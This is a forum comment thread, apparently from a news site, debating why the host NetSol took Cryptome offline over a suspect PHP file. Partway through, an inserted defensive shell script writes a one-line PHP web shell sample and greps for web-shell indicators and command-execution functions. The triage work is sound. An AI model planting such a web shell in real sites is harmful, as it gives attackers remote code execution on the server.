
Re: It's back...
Yep.
Welcome back, John.
Whistle-blowing site Cryptome has been left temporarily unavailable after its service provider NetSol stopped routing traffic towards the site following the discovery of a suspect and probably malicious PHP file. Cryptome's John Young criticised NetSol's decision to pull the plug on the whistle-blowing site as an …
25 June 2015. Update:
Via Twitter @cryptomeorg:
NetSol rushed to reactivate Cryptome. No deal. Henceforth only SM will be used to exchange information. To hell with arrogant dirty ISPs.
Cryptome has been dispersed. Files will appear expectedly and unexpectedly at diverse locations online and off.
Besides pastes, drops, torrent, implants, hides, Cryptome has over a dozen sites for dispersed distribution, more coming. Got means-methods?
By sites and outlets is not meant only online, current leader of dirty work posing as clean.
:o(
It's a bit worrying knowing a site one's visited might be suss. But then I'm an infrequent visitor and the last time was several months ago.
Cryptome must take the cake for the plainest site on the Web but its articles are riveting. I find it endlessly fascinating. Once there, I can spend hours jumping from one government scandal to another. It's quite addictive really.
Nevertheless, when visiting Cryptome, I've always the nagging feeling that the NSA, GCHQ and DSD are logging my IP and every single article/PDF I flip through.
But perhaps I'm just paranoid.
NetworkSolutions is owned by web.com. We've put in a query to web.com inviting it to say when Cryptome.org is likely to be restored, as well as inviting it to comment on Young's criticism of its actions. We'll update this story as and when we hear back from the internet service firm.
Don't you mean "if and when"?
/me is not holding my breath.
Shutting sites down because of a suspect file is a classic sign of a wanky webhost, and a sign that you should change hosts immediately. It's perfectly possible to shut down a particular file or URL and contact the owner of the site with a deadline for fixing it. Shutting a whole site down is a sign that the host is phoning it in.
Happened to me twice on two different hosts, and in one case they buggered off for a week (one external hack; one disgruntled subcontractor on a client's site). Of course, shutting the site down often impedes the owner of the site from finding out what's wrong and fixing it as well.
Sure, I agree (in normal circumstances anyway).
But have you ever visited Cryptome? It mightn't take much of an excuse in Cryptome's case, as I'm sure it's high on the reading list of many government officials and often they won't like what they read (hence my earlier facetious comment re NSA et al).
I'm pretty sure that it wasn't censorship, purely because they were back within 48 hours. Sure, the site's content is a probable motivating factor for the malware to be there in the first place (although it could just as well have been an unfixed hole in the site picked up by an automatic scan for that vulnerability).
When malware is detected (especially email-spewing malware) things begin to happen: search engines post warnings, the address gets added to blackhole lists and so on. This affects not only the site in question but anyone on the same shared server, their hosts, the upstream providers of their hosts, the owners of that IP address parcel and so on. Action has to be taken, and quickly. Which action is taken sorts out the men from the boys, webhost-wise, and NetSol's is kinda lazy but reasonable. They can (in order of wankiness, most to least):
1) Shut down the account and wait for the site's owner to come to them asking where their site went. This has happened to me. Needless to say, we were out of there that same day (and by the way, this is why you should ALWAYS keep your hosting and domains separate...having to extract the domains first would add considerable time to getting back in the game). Also shuts down any sites on that same account.
2) Shut the account down and message the owner explaining why. Also shuts down any sites on the same account.
3) Shut the domain down and contact the owner. This is not uncommon; but leaves the unfortunate catch-22 that the (remote) owner is unable to access anything and therefore can't see or solve the problem.
4) (As happened in Cryptome's case) Shut HTTP down and simultaneously message the owner.
5) Leave the site running; contact the owner; but move the site somewhere else where it's not going to interfere with other clients of the service. This takes time, and is more risky for the webhost. Give the owner a deadline to fix the problem.
In any of the above cases, the webhost may or may not tell the customer where the problem is.
The issue seems to be the 48-hour delay before the site was reinstated. Netsol is a big host and it could be due to something as simple as them switching to a new support system. Or a new policy. Or revenge if the guy has been a bit of a tosser in the past. Blaming everything on a conspiracy seems a little entitled to me.
Certainly if I had a site that was mission-critical or as guaranteed to piss people off as Cryptome, I'd have a plan B site waiting in the wings; then it's just a case of flicking the domains over: 20 minutes tops until you're back on the air. If the domains (on a separate provider) get sanctioned then you can start moaning about conspiracies.
Yes, I'm sure you're correct about it not being censorship. Unlike Snowden, Cryptome is an annoying pimple rather than a gangrenous leg. If anything, it probably acts as a reliable, all-in-one-place updater for second/third-line public servants.
As the site is and has been accessible to US authorities for years, it's probably tolerated on the basis that, weighing up the noise of closing it down/free-speechers etc. versus propagation of potential damage a la Snowden-level leaks, they've let things lie (it's what those in power are prepared to put up with in a democracy). It seems to me that most of the stuff leaked was already available elsewhere.
Again, total supposition on my part, but I'd reckon it'd be a good assumption that John Young and Deborah Natsios have been spoken to in the past and they've a red line they will not cross. The stuff on the site is fascinating (I can read it for hours--it's more entertaining than whodunnits on TV) but, to me, it doesn't seem to be the stuff that'd bring out the Apaches and support crews.
Nevertheless, it's a warts-and-all, in-your-face, site that would annoy many and I'm sure it is monitored by the powers-that-be on a regular basis. Moreover, I'd reckon the site would regularly come under attack, even if not from government.
As a visitor to the site (albeit last time some months ago), I'd love to know what PHP code was suss--what does it do etc. After all, the site is designed not to be a script haven, plain as it is.
What NetSol and likes have been up to is anyone's guess (and a lot of what's happened is probably based on internal politics / perceptions etc.).
Again, any/all of those options you mention could come into play--even the duty IT staff may have played a 'political' hand given an opportunity, who knows. Perhaps Cryptome might be able to eventually leak that too.
;-)
What is wrong with taking the whole site down? How did that one file get on there to start with? Deleting that file should not be enough to get the site put back up, as the hole that allowed it to get there in the first place is most likely still around. Taking the whole site down was sensible. Downvote away.
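A practical follow-on to the point above, added here as an example and not part of the thread or of any tooling used by Cryptome or NetSol: a POSIX shell triage script that finds PHP files carrying common web-shell indicators, pulls the matching requests out of the access log to show how the file arrived, and quarantines the file rather than deleting it. The webroot, the file names (index.php, images/cache.php, upload.php) and the log lines are constructed for the demo; the indicator patterns are a starting point, not a complete detector.

```shell
#!/bin/sh
# Added example: triage a webroot after a hosting provider flags a PHP file.
# Not Cryptome's, NetSol's or any commenter's tooling; the webroot layout,
# the file names and the access-log lines below are constructed for the demo.
set -u

WORK=$(mktemp -d)
WEBROOT="$WORK/htdocs"
LOG="$WORK/access.log"
mkdir -p "$WEBROOT/images"

# Constructed sample content: index.php is benign, images/cache.php is the
# sort of dropped shell a provider's scanner would flag.
cat > "$WEBROOT/index.php" <<'EOF'
<?php echo "<h1>Plain site</h1>"; ?>
EOF
cat > "$WEBROOT/images/cache.php" <<'EOF'
<?php @eval(base64_decode($_POST['c'])); ?>
EOF

# Constructed Apache combined-format log: a normal page view, a POST to an
# upload handler (the hypothetical hole), then the first call to the shell.
cat > "$LOG" <<'EOF'
203.0.113.5 - - [23/Jun/2015:02:11:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2015:02:11:40 +0000] "POST /upload.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2015:02:11:52 +0000] "POST /images/cache.php HTTP/1.1" 200 0 "-" "python-requests/2.7"
198.51.100.9 - - [23/Jun/2015:03:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF

# Print, relative to the webroot, every PHP file whose source shows common
# web-shell indicators: eval() over an obfuscation decoder, or a command
# execution function fed straight from a request superglobal.
find_suspect_php() {
    root=$1
    find "$root" -type f -name '*.php' | while read -r f; do
        if grep -Eq 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)|(^|[^[:alnum:]_])(system|passthru|shell_exec|exec)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)' "$f"; then
            printf '%s\n' "${f#"$root"/}"
        fi
    done
}

# For one suspect path, print every request to it (SHELL lines) and every
# POST logged before the first such request (BEFORE lines), which is where
# the upload vector usually shows up. "Before" here means earlier in the log.
requests_for() {
    log=$1; path=$2
    awk -v p="/$path" '
        { split($0, q, "\""); split(q[2], r, " "); method = r[1]; url = r[2] }
        url == p                 { hit = 1; print "SHELL  " $0; next }
        !hit && method == "POST" { print "BEFORE " $0 }
    ' "$log"
}

# Move a suspect file out of the webroot, keeping it for analysis. This
# removes the payload but not the hole that put it there.
quarantine() {
    root=$1; rel=$2; qdir=$3
    mkdir -p "$qdir"
    mv "$root/$rel" "$qdir/$(printf '%s' "$rel" | tr '/' '_')"
}

# Report only; quarantining is left to the operator once the log has been read.
for p in $(find_suspect_php "$WEBROOT"); do
    echo "suspect: $p"
    requests_for "$LOG" "$p"
done
```

The BEFORE lines are the interesting ones: a POST to an upload handler seconds before the first request to the dropped file points at the hole that stays open after the file is removed, so the access log, not just the flagged file, is what the site owner needs from the host.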
Since I host web sites for other people, more than once I have had to deactivate a website because it was compromised (generally because the owners used old versions of Joomla or WordPress and didn't keep up with patches). If they didn't hire me to take care of their site, then I am not going to go into the site and muck around looking for what is there or how it got there. The ONLY action I can take is to give the site owner notice that there is a problem, explain what the problem is and how it was detected, and take the site offline to the public until it is fixed. If it is a dedicated server or virtual machine and it's spewing outbound traffic, I just isolate the instance or box to its own VLAN and give them instructions on how to VPN into the VLAN to work on it. Of course, I also offer "remediation services" at extra cost, but I'm not going to do it for free.
If the malware can't be removed immediately, of course the site must be pulled until it is removed. No chance of infecting people's computers can be tolerated. Some complaint about how long it took might have made sense, but this reaction just makes the guy look like a loose cannon.
And, of course, I suppose the NSA would love to infect the computers of the people who visit Cryptome...
I think it is BS. I have never heard of a website being taken down due to malicious content being detected on one of its webpages.
I have seen websites taken down by their owners, temporarily, due to malicious content being detected on one of their webpages, while the website was being cleaned up.
I doubt "web.com"/"netsol" would have many customers if they took down websites every time something malicious was detected on one of their webpages. I am going to try to look to see if "web.com"/"netsol" has ever taken down any other website due to something malicious being detected on one of its webpages.
My guess is that someone with some clout reported the issue to "web.com"/"netsol" and they just had a "knee-jerk reaction" and took down the site without due diligence.